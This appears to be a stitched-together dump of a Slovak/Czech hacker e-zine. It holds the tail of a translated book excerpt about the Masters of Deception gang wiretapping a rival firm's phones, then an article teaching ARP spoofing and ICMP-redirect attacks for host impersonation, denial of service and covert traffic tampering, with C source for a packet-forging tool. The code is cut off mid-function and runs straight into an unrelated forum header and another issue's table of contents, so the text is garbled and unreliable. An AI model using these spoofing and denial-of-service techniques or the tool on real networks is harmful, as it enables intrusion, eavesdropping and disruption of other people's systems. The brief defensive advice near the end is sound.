proste cumi. A mysli si, "tento chalanicko ma fakticky nema rad. Je namiereny na mna,
a iba na mna".


Comsec otvori svoje dvere v Maji 1991 a partneri sa v priestrannych kancelariach
v Houstone rychlo zabyvaju. Comsec ma vysoky strop s neonmi a plynove lampy v dvoch
koridoroch. Obcas zakladatelia Comsecu skateboarduju po dlhych prazdnych chodbach a
sulaju sa v pisacich kreslach. Chris byva v zadnej casti budovy, v bejvaku s velkou


Ale je tu jeden problem. Comsec nema ziadnych klientov.


Sefovia Comsecu maju tyzdenne porady, na ktore vsetci chodia. Rozhodnu sa distribuovat
spravy do tlace o ich zabezpecovacie sluzby. Ako kto ? Ako profesionalni ex-hackeri,
spravia si zoznam pravdepodobnych klientov. Prescanuju si fajly na undergroundovych
BBSkach aby nasli mena podnikov ktore boli infiltrovane, potom tam volaju a ponukaju svoje
sluzby.


Spravy v tlaci funguje super, pretoze v Juni 1991, menej ako mesiac po oficialnom
debute Comsecu, casopis Time uverejni o tychto hackeroch story.


Na druhy den okamzite zacnu zvonit telefony. A zvonia a zvonia. Nemozete si kupit lepsiu
reklamu ako Time. Comsec ma klientov ! Jeden je konzultant reprezentujuci telekomunikacny
priemysel, objednava si vyzkum nedavnych vypadkov regionalnych Bell spolocnosti.
Klient zaplati US$5000 zalohu.


Samozrejme ze publicita v Time ma aj iny efekt.


Hore na severe, chalani z MOD citaju tieto story.


John Lee dostane super napad ako si z Texasanov vystrelit. Preco ho to do paze nenapadlo
uz skor ?


Svoj plan zacne realizovat pocas toho dlheho, horuceho leta 1991. Aspon ho to odreaguje
od skutocnosti ze sa musi potit v horucom baraku bez klimy na Kosciusko Street.
Jeho plan je spiclovat, a je vcelku jednoduchy. John sa naloguje na Southwestern Bell
ustrednu ktora kontroluje telefony Comsecu v Houstone.


Potom John napise prikazy a zisti z ustredne ktore z telefony v Comsecu sa momentalne
pouzivaju.


Ak sa nejake pouzivaju, John vie ze momentalne prebieha nejaka konverzacia.
Pouziva sa telefonna linka. Takze napise zopar prikazov, tak ako by to spravil
operator, a ziska kontrolu nad danou linkou. Takto jednoducho odpocuva prebiehajucu
koverzaciu.


Na linke pocut tichy klik, ale nie je to ten typ hluku ktory by ste si vsimli, pokial
na neho necakate. A nikto v Comsecu nema dovod nato aby si mysleli ze ich niekto
odpocuva.


John pravidelne odpocuva hovory. To je ten pravy sposob ako zistit co ma nepriatel
za lubom a ako ocakavat kazdy krok Texasanov pred tym ako ho spravia. Takze tu mame
Johna, ako jedno poobedie pocuva ako tato bezpecnostna firma ma telefonat od svetoznameho
hackera, Creiga Neidorfa.


Da sa s lahkostou povedat ze v roku 1991 niet znamejsieho hackera ako Neidorf. A to preto
lebo rok predtym Neidorf porazil federalnu vladu v ich vlastnej hre. Mesiace potom,
Neidorfov pripad sa stal legendou. (A roky potom sa opatrni prokutarovi ktori zvazovali
zalovanie hackerov jeden druheho varovali pred "potiahnutim dalsieho Neidorfa.")


Spolu-editor elektronickeho casopisu Phrack, Neidorf za zucastnil v lete 1990 v Illionse
sudneho procesu. Bol obvineny z vlastnictva a publikovania takzvanych sukromych
dokumentov telekomunikacnej firmy vo Phracku. Vlada argumentovala ze publikovane informacie
mali hodnotu tisicov dolarov, na zaklade odhadov telekomunikacnej firmy. Ale v priebehu
sudneho procesu obhajoba dokazala ze dokumenty namiesto tajnych informacii obsahovali
informacie ktore boli verejne pristupne, Bellcore predaval tieto informacie hocikomu kto
si zaplatil 13 dolarov za clanok v technickej tlaci. Zhrozeni federalni prokuratori
vzdali pripad este pred tym ako sa dostal pred porotu. Ano, Neidorf bol pre niektorych
hackerov hrdina. Ale bola to jeho notorickost ktora ho preslavila v undergrounde
kyberpriestoru.


Teraz okolo obeda pracovneho dna v lete 1991, Chris Goggans odpovedal na telefonat
v Comsecu a na druhej strane linky je Neidorf. (John potichu odpocuva.) Telefonat je
iba priatelsky pokec, ale dnes je Neidorf fakticky nasraty. Problem je ze stale dostava
anonymne telefonaty, furt ho niekto otravuje. Mysli si ze vie kto je zodpovedny, ale
chce aby sa to skoncilo.


"Hm vyzera to ze ti robia nieco podobne ako robia aj nam," odpoveda Chris.


"Niekto prave volal mojmu otcovi do Virginie", hovori Neidorf. Chris nie je prekvapeny,
ale je za svojho kamosa tiez nastvany. Ma teoriu o tom kto by za tym vsetkym mohol byt.


"Vyzera to na Corrupta," hovori Chris, opakujuc svoje podozrenie ze John Lee ho
otravuje aj v Houstone. "Vyzera to ze to on vsetko robi." V tej chvili zazvoni druhy
telefon v Houstone, dalsi prichodzi telefonat pre Comsec. Chris poprosi Neidorfa aby
chvilocku pockal na linke, a zdvihne druhy telefon. Hlas na druhej strane tej druhej linky
hovori Chrisovi, "Heh no jo, to fakt vyzera ze to robim ja."


Chris je taky nasraty, ze ani nemoze normalne rozmyslat. John Lee odpocuval linky !
Sukromne telefonaty Comsecu ! Ako dlho ? Ako casto ? Co vsetko pocul ? Co vsetko vykecal
svojim kamosom v MODe ? Ked sa toto vsetko dostane von, Comsec bude na posmech !


Najali by ste si firmu na computer security, ktora si ani svoje vlastne telefonne
linky nevie zabezpecit ?


Chris zavola FBI, nevediac ze Kaiser a Staples uz cele mesiace zhromazduju dokazy
na sudny proces proti MOD. Ci Chrisov telefonat ovplyvnil nacasovanie nie je zname, ale
sudny proces proti MOD zacne v Juli 1992.


Sudne obvinenie ma 11 casti a obvinuje Marka, Paula, Eliho, Johna a dalsich clenov
MOD z nelegalnych prienikov do pocitacov. Kazda z 11 casti obvinenia je postihnutelna
minimalne piatimi rokmi vo vazeni. Kazda z 11 casti ma maximalnu pokutu 250 000 dolarov.


Tento sudny pripad je taky velky, taky senzacny a taky prevratny, ze US prokurator
sam zvola tlacovu konferenciu v lobby St. Andrews Plaza, na riaditelstve v Manhattane.
Chce ohlasit tento pripad mediam. Je to spichnute tak trochu na rychlo, rady skladacich
stoliciek siahaju az po stenu s detektormi kovov a vpredu po nepriestrelnu budku US-Marshala.
Dnu sa sype retaz navychyrenejsich New Yorskych novinarov a pytaju si handouty.
Obzaloba je zhrnuta do 23 stranoveho reportu prehusteneho faktami, vypoctami, pravnickymi
vecickami. Prehlasenie pre tlac ktore sa snazi vysvetlit ze o com toto obvinenie vlastne je, je
samo o sebe 8 stran dlhe. A potom mame este grafy na tabuli, ktore prichystal agent
Secret Service Rick Harris.


Hlavnu pointu ktoru sa obzaloba snazi preukazat je celo-narodny rozsah tychto pocitacovych
prienikov.


"Toto je kriminalita buducnosti," hovori US prokurator Otto Obermaier, vysoky chlapik v
tmavom obleku. Ukazuje prstom a zdoraznuje odpor voci pocitacovej kriminalite. "Odkaz ktory
chceme poslat do sveta z tejto obzaloby je, ze takyto druh cinnosti nebude tolerovany."


Clenova MOD su obvineni z najrozsiahlejsich prienikov najvacich a najsenzitivnejsich
pocitacovych systemov v krajine. Vlada sa rozhodla ze z tychto teenagerov spravi vzorovy
priklad. Odkaz, ako to vola Obermaier, npripusta ziadnu toleranciu. Ak si hacker ktory
rozmysla ze sa vyda po stopach Masters of Deception, radsej si to rozmysli.


Ani pomaly nie je miesto pod podiom - vsetci novinari sa snazia uchytit co najviac
informacii. Su tam prokuratori. Potom su tam agenti FBI a Secret Service a su tam aj
vysetrovatelia z Ministerstva Spravodlivosti USA - odbor Pocitacovej kriminality.


Obermaier povie novinarom vsetko o tychto trestnych cinoch. Hovori o tom ako chalani
sposobili firmam skody v tisicoch dolarov vo forme vyplat bezpecnostnym specialistom,
stratenym casom na serveroch. Ale nepovie im ze tito nebezpecni hackeri su vlastne iba
skupina teenagerskych chalanov ktori su priatelia, lebo zdielaju spolocne hobby.


Tato story sa dostane az do vecernych sprav na NBC s Tomom Brokawom. Je to ten pravy
pribeh s ktorym Brokaw ukoncuje spravy - reportaz na zamyslenie. Je tam zaber ako Mark
vyucuje pocitacovu triedu v New School for Social Research v Greenwich Village. Reportaz
sa konci na tmavej dazdivej ulici. Mark hovori reporterovi NBC ze je jednoznacne obet
politickeho vysetrovania.


Keby bol z toho byval sudny spor, tak tento pripad s MOD by sluzil ako precedens celej
krajine, spravila by sa merna latka, podla ktorej by vlada mohla odsudzovat takzvanych
pocitacovych kriminalnikov.


Ale nebol z toho sudny spor, pretoze vsetci chalani z MOD sa pocas roka deklarovali pred
sudcom ako vinny. Vsetci to vzdali. Co im zostavalo potom ? Bolo to na prokuratoroch aby
doporucili vysku trestu a na sudcovi aby to schvalil.


Hackeri ktori prichadzaju do budovy Citicorpu prvy piatok vo Februari 1994 maju
tazke boty, siroke nohavice a obite kanady, vysoko zasnurovane. Keby ale bol Jul,
samozrejme by neboli obleceni inak. Je to ich uniforma.


Dnesna session je prve stretnutie po takmer piatich rokoch na ktorom nie je pritomny
nikto z MOD - Mark, Paul, Eli a John su vsetci vo vazeni. Su tu tucty hackerov, vo veku
od 14 do 40, omnoho viac ucastnikov ako vtedy zaciatkom 1989. Odvtedy sa svet o dost zmenil,
odkedy sa Mark, Eli a John nejak nasli, a zacali spolu fungovat.


Je to vlastne ako keby ich cely svet dobehol. To co robili chalani MOD pre zabavu -
rekreacne behali cez kontinenty po kabloch - sa stalo narodnym sportom. "Surfovanie Netu" je
teraz popularnejsie ako kedy bolo CB radio a ludia vsade si kupuju svoj prvy pocitac
a pripajaju sa na online sluzby, aby sa spojili s informaciami z celeho sveta.


Preto nie je prekvapive, ze novi clenovia zvedavej generacie zaplnaju atrium Citicorpu.
Dnes vecer je ale diera tam, kde byval kedysi Mark, pri telefonnych automatoch, tam kde
tak rad postaval kym sa skupina kamosov zbehla okolo neho a davala mu technicke otazky.
Dnes vecer ho tam nenajdete vo familiarnom modro-bielom pulovri, nebudete pocut jeho
hlas. Dnes vecer je Mark daleko. K vratnici Pennsylvanskej okresnej vaznice prisiel neskoro
vecer v Januari 1994, dvere za nim zapadli este pred tym ako sa stacil rozlucit s priatelmi.
A nedostane sa odtial az do Novembra. Sudca ktory odsudil Marka povedal, ze Mark svojimi
aktivitami bol messenger, vzor pre hackersku komunitu. A tak sa sudca rozhodol poslat naspat
message.



Po sest-mesacnom vazeni vysiel John chudsi, svalnatejsi, vlastne v najlepsej forme v akej
kedy bol. Na jesen 1994 sa rozhodol ist naspat na Brooklyn College, kde nastupil studium
filmovej tvorby. Ma kopec napadov na filmy ktore by xcel zrealizovat.


Po skonceni vazby vo federalnom vazeni v Pennsylvanii sa Paul dostane na slobodu na jar
1994. Mark sa ma dostat von niekedy okolo Dna Vdakyvzdania. Pre obidvoch z nich sa hackerske
dni stanu vybornym treningom na job: Paul pracuje pre firmu ktora patra po nezvestnych
osobach s vyuzitim verejnych databaz. Mark prevadzkuje servre v Echo, Manhattanskom Inet
providerovi. Marka maju uzivatelia v Echo tak radi, ze zalozia malu zbierku kym sedi v lapaku
a kupia mu novy laptop ked sa vrati na slobodu.


Legion of Doom a Comsec su uz iba pamiatka. Comsec skoncil cinnost a Chris Goggans pracuje
v Austine pre Dell, skuma pokrocile bezdratove siete. S ostatnymi clenmi LOD zozbierali
tisicky odkazov, e-mailov, elektronickeho grafitti z roznych elitnych BBSiek z 1980-tych rokov
a predava to cez firmu LOD Communications. Predava aj tricka - na hackerskej stretavke
Ho-Ho Con v decembri 1992 v Houstone predava tricka s logom "The Hacker War" krizom cez
prsia s mapou Spojenych Statov s vyznacenymi miestami najvacsich bitiek, hlavne Houston, Austin
a New York.


Na zadnej strane tricka je napisane: LOD 1, MOD 0. A je tam hlaska ktora je udajne od Corrupta,
ktoru Chris dostal z tajnej databazy MOD: "Nezalezi len na tom aby sme vyhrali, ale na tom
aby vsetci ostatni prehrali."



Michelle Slatalla a Joshua Quittner, quit@newsday.com



Autori su reporteri New Yorskeho platku Newsday. Su zenati, maju dve dcery a macku so
siestimi prstami. Toto bol uryvok z ich knizky "Masters of Deception: The Gang That
Ruled Cyberspace" ktora vysla v nakladatelstve Harper-Collins v roku 1995. Na Slovensku
alebo v Cechach podla mojej informacie preklad nikdy nevysiel..


preklad pajka




navrat na obsah





redir hry s arp a icmp



existuju bugy a existuju features. castokrat je rozdiel medzi oboma iba v oku
vsemohuceho. chcem ukazat dva legitimne protokoly, ARP a ICMP, ktore ked sa
spravne implementuju, dokazu spravit cosi co nie je, ehm, nie je ziaduce.



kym pasivne utoky (sniffing) ktore zneuzivaju rootovsky pristup po LANke su
extremne popularne a aj lamerske rootkity maju vzdy aspon nejaky jeden net sniffer,
aktivne utoky zase nie su az take rozsirene. ale aktivna ucast v zivote vasej
LANky vam moze priniest kopec zabavy a radosti. to ste asi uz vedeli, akurat technicke
detajly boli nejak zahmlene. takze, budiz svetlo.



postupy ktore vysvetlim zahrnuju spoofing a DoS. aj ked ine druhy spoofingu,
ako napriklad IP blind spoofing, su omnoho vseobecnejsie a silnejsie, z pohladu
vyuzitelnosti pozaduju kopu roboty, hadania, a tazko sa implementuju. ARP spoofovanie je
naproti tomu velmi jednoduche a robustne.



aj ked ARP spoofovanie je mozne iba na lokalnej sieti, moze to znamenat seriozny
bezpecnostny problem ktory rozsiri uz existujucu dieru v bezpecnosti. ak sa niekto nabura
na jeden server na subnete, ARP spoofing moze byt pouzity na napadnutie ostatnych masin na nom.



zoberme si takuto hypoteticku siet


IP 10.0.0.1 10.0.0.2 10.0.0.3 10.0.0.4
hostname cat rat dog bat
hw addr AA:AA BB:BB CC:CC DD:DD (pre skratenie)


to vsetko mame pospajane na ethernete jednoduchym sposobom (t.j. ziadne switche,
ziadne smart huby). dajme tomu ze si hackol masinu cat, mas na nej roota a chces sa
dostat na dog. vies ze dog ma trust vztah s rat, takze ak dokazes uspesne spoofnut rat, mozes
cosi ziskat.



prva vec co nas napadne (myslim ze kazdeho to asi raz napadlo) je "preco si nenastavim
svoju IP adresu na adresu tej druhej masiny a..." To zial nefunguje, alebo aspon nefici to
poriadne. ak povies ethernetovemu driveru na cat ze jeho IP adresa je 10.0.0.2, zacne odpovedat na
ARP requesty na tej IP adrese. ale takisto aj rat. je to race podmienka a neexistuje v nej
vitaz. ale lahko sa moze stat ze sa z teba stane porazeny, pretoze tato konkretna situacia
sa odohrava dost casto ked sa nejaka masinka zle nastavi na uz existujucu IP adresu, takze kopu
softwaru si takuto vec hned vsimne a okamzite spustaju poplach. aj vselijake traffic analyzere na taketo
nieco upozornuju. riadok v syslogu ktory hovori cosi neprijemne (spominajuc ethernetovu adresu cat-u) na
konzole LAN administratora nie je zrovna to co potrebujes. a to co ty chces nemusis vobec mat,
cize dostat fungujuce spojenie.



tomuto ale mozeme samozrejme pomoct. program na konci tohoto clanku, send_arp.c,
moze byt uzitocny nastroj. ako hovori jeho meno, posle ARP packet [presnejsie povedane
ARP reply: pretoze v ARP protokole bude reply s radostou privitany aj ked si ho nikto nevyziadal.
request by tiez v pohode fungoval, toto je dost divna logika ARP protokolu] na siet a mozes spravit
z tohoto packetu co chces. co potrebujes je schopnost specifikovat zdrojovu a cielovu IP a hardwarova adresu.



zaprve nechces aby bol tvoj ethernet driver moc ukecany, a to sa lahko docieli
prikazom ifconfig -arp. samozrejme bude potrebovat aj tak ARP info, takze ho budes
musiet krmit do kernelu manualne cez arp(8). najdolezitejsia cast je presvecit svojich
susedov. v tomto pripade chces aby dog veril ze hardwarova adresa rat je ta co ma cat (AA:AA),
takze posles ARP reply so zdrojovou IP adresou 10.0.0.2, zdrojovou hw adresou AA:AA,
cielovou IP adresou 10.0.0.3 a cielovou hardwarovou adresou CC:CC. teraz si mysli dog ze
rat je na AA:AA. samozrejme zaznam v cache expajruje, takze ho musime updatovat (request musime
znovu a znovu posielat). ako casto, to zalezi od konkretneho systemu, ale kazdych 40 sekund
by malo stacit vo vacsine pripadov. kludne to poslite aj castejsie, nic sa neublizi.



moze nastat komplikacia v suvislosti s ARP caching. niektore systemy, napr. Linux sa budu
snazit updatovat cache vyslanim unicast ARP requestu na cachovanu adresu (ako ked ti manzelka
zavola aby sa presvecila ze si tam). takyto request moze vsetko posrat, pretoze zmeni
ARP zaznam obete, ktory si prave fejkol, takze tomu musime zabranit. toto dosiahneme tak,
zze nakrmime "manzelku" s reply packetmi ktore si nikdy nevyziadala. prevencia je najlepsi liek,
ako vzdy. tentokrat, skutocny packet z dog na rat by mal byt zaslany, akurat ho posle cat, a nie dog,
ale rat to nedokaze rozlisit. opat, pokial to spravime kazdych 40 sekund, vacsinou to staci.



takze postup je jednoduchy. nabehni aliasovy interface, napr. eth0:1 (alebo pouzi uz existujuci,
to je fuk), s IP adresou rat a so zapnutym ARP protokolom - najprv musis nastavit cache vstupy,
a nebude to fungovat na ne-arpovom interfaci. nastav host route pre dog cez spravny interface. nastav
cache vstup pre dog, vypni arp, a vsetko mas nastavene.



teraz posli send_arp (na dog aj na rat) a teraz si dog mysli ze si rat. pamataj na to ze mas
dookola posielat tieto ARP packety na dog aj rat.



tento utok funguje iba na lokalnej sieti, samozrejme (vo vseobecnosti sa da povedat
ze ho mozes pouzit tak daleko ako mozu ist ARP packety, vacsinou to vsak nie je velmi daleko, pretoze
sa skoro nikdy ARP packety neroutuju). zaujimave rozsirenie je vymenit hardwarovu adresu v hore nacrtnutom
sceneriu s routerovou adresou. ak to funguje (nie som si isty ze to vzdy bude fungovat, implementacia ARP
routeru sa tazsie da okaslat a kedze to nechcem skusat na skutocnych routeroch, neviem, ale jednoducho
neexistuje dovod preco nie) mozes sa lahko tvarit ako masina na lokalnej sieti pre cely svet. takze
cielova masina moze vlastne byt hocikde, ale masina na ktoru sa tvaris musi byt na tej istej LANke.



co este mozeme robit



okrem spoofovania mozes s ARP robit este kopec veci. jedinym limitom je obloha. DoS je
najzavnejsou aplikaciou.



krmit obet zlou hardwarovou adresou je silny sposob ako ju umlcit. mozes zabranit aby
komunikovala s konkretnou masinou (a velkost ARP cache zvycajne umoznuje zahrnut do toho
celu siet, takze dokazes efektivne zabranit komunikacii s celou sietou). zjavnou obetou
je router. Zaplnanie cache je opat dvoj-smerne: mal by si krmit aj victim system, aj
system na ktory nexces aby victim komunikoval. Najjednoduchsi sposob je krmit neexistujucu
adresu. Ale nie je to ta najefektivnejsia metoda, pretoze system rychlo pride na to ze
s nikym nekomunikuje a posle ARP request. Samozrejme ze tvoj dalsi vyslany jed to vynuluje, ale
musis to robit dost casto. Efektivnejsi sposob je krmit victim hardwarovou adresou nespravnej
masiny, ktora sama o sebe je v pohode na sieti. zalezi to na konkretnej situacii, ale casto
sa stava ze victim vysiela packety rozneho druhu ktore prijdu na zlu masinu, a ta zla masina
posle naspat ICMP Xxx Unreachable odkaz, co nejakym perverznym sposobom emuluje spojenie.
Taketo pseudo-spojenie moze predlzit expiraciu cache. Na linuxe, napriklad, pseud-spojenie
predlzi expiraciu cache z beznej 1 minuty na zhruba 10 minut. do vtedy vacsina alebo vsetky
TCP spojenia su v kybli. to moze dost nasrat. takymto sposobom moze ARP packet niekoho fest dokaslat.



ARP je aj seriozny nastroj na profesionalny cierny humor. predstavte si ze niekto si
nastavi relay, alebo tunel, tak ze presvedci dve susediace masiny aby posielali packety
urcene pre vzajomnu komunikaciu na Ethernet relay. Ak relay jednoducho forwarduje packety na
ich spravnu destinaciu, nikto si nic nevsimne. Ale jednoducha modifikacia datoveho toku moze
spravit uchvatne zmeny v mentalnom stave jedinca. Jednoduchy CPU-nenarocny "filter" moze
prehadzovat randomne dva bajty v nepravidelnych casovych intervaloch. Ak filter udrie na
datovu cast, vacsinu checksumu sa nezmeni, t.j. datovy tok sa bude zdat byt neposkodeny, avsak
divne a nevysvetlitelne veci sa _budu_ diat bez akehokolvek zjavneho dovodu.


ICMP redirekty



stejneho efektu jako ARP kes poisoning muzete dosahnout i jinak, pouzitim
legitimni soucasti ICMP protokolu - ICMP route redirekt.
v normalnich situacich je route redirekt pouzivan routerem, ktery se vam
snazi sdelit, ze existuje i kratsi cesta k nejake konkretni masine nez pres
nej. puvodne se pocitalo jak s redirekty na site tak na jednotlive masiny, ale
pozdeji se od pouzivani net redirektu upustilo a jsou vetsinou zpracovavany
jako obycejny host redirekt. spravne zkonstruovany ICMP paket, ktery projde
vsemi kontrolami spravnosti (napr. musi prijit z defaultniho routeru pro
tu destinaci kterou redirektuje, novy router by mel byt na primo pripojene
siti apod.) zpusobi pridani host-route zaznamu do systemovych routovacich
tabulek.


tento pristup je stejne bezpecny jako samotny protokol ICMP, to jest vubec.
falsovani IP adresy routeru je velmi jednoduche, prilozeny program
icmp_redit.c dela presne co potrebujeme. pozadavky kladene RFCkem rikaji, ze
system MUSI vzdy akceptovat ICMP redirekt, a jedinou vyjimku maji routery.
jednotlive implementace to samozrejme dodrzuji, funguje to vsude kde jsem to
zkousel. (tedy s vyjimkou cisteho kernelu 2.0.30, kde je kod nejak pokaslany.
jinak to funguje na 2.0.29 i na 2.0.31pre9).


ICMP redirekt se primo nabizi pro denial-of-service utoky. host-route
zaznamy v routovacich tabulkach nejsou casove omezeny, takze jejich platnost
nevyprsi tak jako u ARP kese. navic jeho pouzitelnost neni omezena na
lokalni sit, takze utok muze prijit odkudkoliv. takze v pripade, ze cil
prijima ICMP redirekty (a je pristupny po siti), muze mu byt zabraneno v
komunikaci s kteroukoliv konkretni adresou na siti (samozrejme s vyjimkou
masin na stejnem subnetu, kde se routing nepouziva). idealnim cilem jsou
treba nameservery.


co s tim


ARP je protokol pouzivany na nizke urovni, tudiz se s nim obvykle nesetkate,
respektive setkate, ale nevite o tom. obcas se s nim potykaji administratori
siti, ale pokud vse facha jak ma, nikdo se o nej nestara. kdokoliv se muze
podivat do ARP kese prikazem arp(8), ale obvykle to jen tak nekoho
nenapadne, leda pokud se vyskytl nejaky naprosto totalne zahadny problem.
dokonce i windows 95 maji prikaz arp, a jeho znalost vam muze obcas dobre
pomoct. (nicmene neexistuje zpusob, jak poznat ze jste cilem utoku
prichazejicho z cizi site pres gateway arp spoofing.) stejne jako u ARP kese
neni tezke najit zaznamy "host-route" zaznamy zpusobene ICMP redirektem,
proste se podivejte do systemovych routovacich tabulek. (ve vetsine verzi
route(8) takovy zaznam poznate podle flagu "D"). jen abyste vedeli.


hore prezentovane schema ARP utoku funguje perfektne na obycejnem 10Base2
ethernetu. nicmene pokud jsou masiny propojeny nejaky pokrocilejsim
zpusobem, trebas nejakymi smart huby nebo switchi, utok muze byt velmi
napadny, ne-li rovnou nemozny. (a to plati i pro pasivni utoky). takze to je
dalsi z duvodu proc byste meli investovat do fakt poradneho sitoveho zeleza.
bude se vam o poznani lepe spat.


osobne vubec nerad vidim, ze veci jako ICMP redirekt byly implementovany
jako defaultni soucast systemu. za prve - vetsina siti ma velmi jednoduchou
strukturu, takze si v pohode vystacite s obycejnou routovaci tabulkou. za
druhe - i v sofistikovanejsich sitich lze zmeny delat rucne, neni to zadna
dynamicka zalezitost, tak proc to delat pres ICMP? a do tretice - je to tak
nebezpecne, ze bych to nejradsi na mych systemech vypnul, i za cenu ze budou
mene kompatibilni s RFC1122. bohuzel to nemusi byt tak jednoduche. na linuxu
nebo kteremkoliv jinem open-source systemu muzu prinejhorsim upravit
zdrojaky kernelu a deaktivovat kod pomoci #define. na IRIXech 6.2 (a mozna i
jinejch verzich) lze nastavit icmp_dropredirects=1 nastrojem systune (jo,
fakt se mi libi ze to tam je, fakt jo.) jine OS mohou byt podobne
konfigurovatelne, ale nemam podrobnejsi informace.


u ARP protokolu se setkavame se situaci, kdy je resolvovani jmen vyreseno
dynamicky bez nejakeho centralniho serveru. ale nemusi tomu tak byt vzdy.
kdyz nekdo chce prevest hostname na IP, posle se dotaz na nameserver, nebo
se pouzije /etc/hosts, to znamena, ze je pouzito nejake staticke mapovani.
nevidim duvod proc tento pristup nepouzit i u ARP. ethernetove hardwarove
adresy se nemeni casto, a kdyz uz nahodou, tak to prece admina nijak
nezabije provest zmeny v prislusne tabulce. ethernet muze byt provozovan v
no-cache modu, potrebujete se jen ujistit ze zaznamy v ARP cache budou
permanentni. jako bonus usetrite trochu sitoveho provozu. ARP mapy muzete
distribuovat beznymi zpusoby, napriklad rdist, rsyns (ano, NIS by se take
dalo pouzit, ale predpokladam, ze jestli pri zajisteni bezpecnosti jdete tak
do hloubky ze se zabyvate ARP protokolem, nepouzivate asi NIS). stara
tradice /etc/ethers se muze znovu probrat k zivotu. ale zprovozneni nejakeho
poradneho ethernetoveho switche mi prijde lepsi (s jeho zaplacenim je to ale
horsi, heh).


stara moudrost je platna naveky: nepouzivejte autentifikaci zalozenou na
hostname. ti kteri tak ucini, budiz uvrzeni v nemilost sitovych bohu.


cheers,



yuri, volobuev@t1.chem.umn.edu


P.S. jeste k firewallum

presne vidim, jak hodne z vas po precteni sekce o ICMP svrbi prsty, abyste
mi napsali, ze ICMP pakety jdou v pohode odfiltrovat na firewallu. nepiste
mi. ja to vim.


znam hodne lidi, kteri se svym "ja mam firewall, je to super,
a kdo nepouziva firewall, je totalni blb" rikaji ze plno bezpecnostnich
problemu se vyresi jako mavnutim kouzelnym proutkem jen tak, ze mezi sebe a
zle hochy date firewall. samozrejme souhlasim ze firewall je skvela vec, ale
podotykam, ze jeho pouziti nemusi byt vzdy mozne nebo efektivni.


predstavte si prostredi, kde vsechny masiny jsou primo pripojeny na
internet, kde musite sdilet subnet s lidmi ktere vubec neznate (a kteri
samozrejme maji krasna nova vylestena SGIcka... kricici "tu jsem. pojdte si
me hacknout". tihle lide prece znaji UNIX, vzdyt ho videli v Jurskem
Parku.), nebo kde ma nad vasim routerem kontrolu cizi organizace. vitejte na
akademicke pude ... tady firewally nepouzivame. dalsi vec je, ze v techto
prostredich se nemusite tak bat cizich utocniku tolik jako insideru. bez
pecliveho zabezpeceni jednotlivych stroju je to totalni dzungle, ve ktere
ale nekteri lide potrebuji (kupodivu) pracovat. takze priste az budete
nekoho lamat do firewallu, uvedomte si prosim, ze to je krasna vec, ale
nehodi se pro kazdeho.



/* send_arp.c

tento program posle jeden ARP packet so zdrojovou/cielovou IP a ethernetovou
hardwarovou adresou zadanou uzivatelom. da sa to skompilovat a bezi to pod
linuxom ale pravdepodobne to funguje na hocijakom unixe co ma SOCK_PACKET

yuri, volobuev@t1.chem.umn.edu

*/

#include <stdio.h>
#include <ctype.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <netdb.h>
#include <sys/socket.h>
#include <linux/in.h>
#include <arpa/inet.h>
#include <linux/if_ether.h>


#define ETH_HW_ADDR_LEN 6
#define IP_ADDR_LEN 4
#define ARP_FRAME_TYPE 0x0806
#define ETHER_HW_TYPE 1
#define IP_PROTO_TYPE 0x0800
#define OP_ARP_REQUEST 2

#define DEFAULT_DEVICE "eth0"

char usage[]={"send_arp: sends out custom ARP packet. yuri volobuev'97n
tusage: send_arp src_ip_addr src_hw_addr targ_ip_addr tar_hw_addrnn"};

struct arp_packet {
u_char targ_hw_addr[ETH_HW_ADDR_LEN];
u_char src_hw_addr[ETH_HW_ADDR_LEN];
u_short frame_type;
u_short hw_type;
u_short prot_type;
u_char hw_addr_size;
u_char prot_addr_size;
u_short op;
u_char sndr_hw_addr[ETH_HW_ADDR_LEN];
u_char sndr_ip_addr[IP_ADDR_LEN];
u_char rcpt_hw_addr[ETH_HW_ADDR_LEN];
u_char rcpt_ip_addr[IP_ADDR_LEN];
u_char padding[18];
};

void die(char *);
void get_ip_addr(struct in_addr*,char*);
void get_hw_addr(char*,char*);

int main(int argc,char** argv){

struct in_addr src_in_addr,targ_in_addr;
struct arp_packet pkt;
struct sockaddr sa;
int sock;

if(argc != 5)die(usage);

sock=socket(AF_INET,SOCK_PACKET,htons(ETH_P_RARP));
if(sock<0){
perror("socket");
exit(1);
}

pkt.frame_type = htons(ARP_FRAME_TYPE);
pkt.hw_type = htons(ETHER_HW_TYPE);
pkt.prot_type = htons(IP_PROTO_TYPE);
pkt.hw_addr_size = ETH_HW_ADDR_LEN;
pkt.prot_addr_size = IP_ADDR_LEN;
pkt.op=htons(OP_ARP_REQUEST);

get_hw_addr(pkt.targ_hw_addr,argv[4]);
get_hw_addr(pkt.rcpt_hw_addr,argv[4]);
get_hw_addr(pkt.src_hw_addr,argv[2]);
get_hw_addr(pkt.sndr_hw_addr,argv[2]);

get_ip_addr(&src_in_addr,argv[1]);
get_ip_addr(&targ_in_addr,argv[3]);

memcpy(pkt.sndr_ip_addr,&src_in_addr,IP_ADDR_LEN);
memcpy(pkt.rcpt_ip_addr,&targ_in_addr,IP_ADDR_LEN);

bzero(pkt.padding,18);

strcpy(sa.sa_data,DEFAULT_DEVICE);
if(sendto(sock,&pkt,sizeof(pkt),0,&sa,sizeof(sa)) < 0){
perror("sendto");
exit(1);
}
exit(0);
}

void die(char* str){
fprintf(stderr,"%sn",str);
exit(1);
}

void get_ip_addr(struct in_addr* in_addr,char* str){

struct hostent *hostp;

in_addr->s_addr=inet_addr(str);
if(in_addr->s_addr == -1){
if( (hostp = gethostbyna

00000001000001020061730200619251
pajkus
 pajkus      03.03.2004 - 13:31:17 [1K] , level: 1, UP   NEW




::::::::::. :::::::.. :::.,:::::: ::: ... . :
`;;;```.;;;;;;;``;;;; ;;;;;;;'''' ;;; .;;;;;;;. ;;,. ;;;
`]]nnn]]' [[[,/[[[' [[[ [[cccc [[[ ,[[ [[,[[[[, ,[[[[,
$$$"" $$$$$$c $$$ $$"""" $$' $$$, $$$$$$$$$$$"$$$
888o 888b "88bo,888 888oo,__ o88oo,.__"888,_ _,88P888 Y88" 888o
YMMMb MMMM "W" MMM """"YUMMM""""YUMMM "YMMMMMP" MMM M' "MMM

prielom #11, 13.4.99 , prielom(at)hysteria.sk, http://hysteria.sk/prielom/




obsah



sifrovani souboru v praxi

webserver na 20 radku

ako preniknut do systemu zena

interview s bruce sterlingom

smurf attack

valka elektronickych gangu II.

abednego







sifrovani souboru v praxi



nerikejte, ze nemate doma na disku
nejake privatni informace. nezalezi na tom jestli to je sbirka /etc/passwd z
